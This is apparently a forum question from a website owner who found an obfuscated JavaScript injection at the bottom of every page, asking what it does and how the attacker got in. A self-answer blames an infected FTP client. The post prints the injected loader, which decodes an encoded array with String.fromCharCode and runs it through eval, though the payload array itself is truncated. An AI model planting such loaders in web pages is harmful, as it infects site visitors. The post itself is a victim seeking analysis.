CODEWITHSUNDEEP
javascriptsecurityhosting
Tom
Tom

Reputation: 16270

Website Security - Hacked by this JS script

Our site is hosted on a rather popular .NET hosting provider. So I assume it is secured and problem is on our side. Please tell me if I am wrong.

I received complaints from my website saying it has virus in it. So I go check the home page.

I noticed in every page we have the following extra piece of script at the bottom of the page!

<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>

Only I know the password and I sware didn't give it to anyone. The password is random and up to the security standard, we change the password about once a year, no very frequent I know, but I guess it is okay.

Questions are:

  1. WTF is this script doing? How can I reverse-engineer the n=["9".....] array? I want to find a trace.

  2. In what possible ways did we screwed up and let the hacker come in? In this case could he have done it in anyway other than bruce force our password and got lucky?

Upvotes: 1

Views: 700

Answers (1)

Tom
Tom

Reputation: 16270

"A snippet at the bottom of every page is usually an indication that your FTP program is infected and needs to be removed/changed. – techfoobar"

Although I am not 100% sure, but I think techfoobar is correct. The FTP software I was using to upload the site must have been infected. I don't know how it happened, but it is crashed and no longer functioning in the OS now.

Upvotes: 1

Related Questions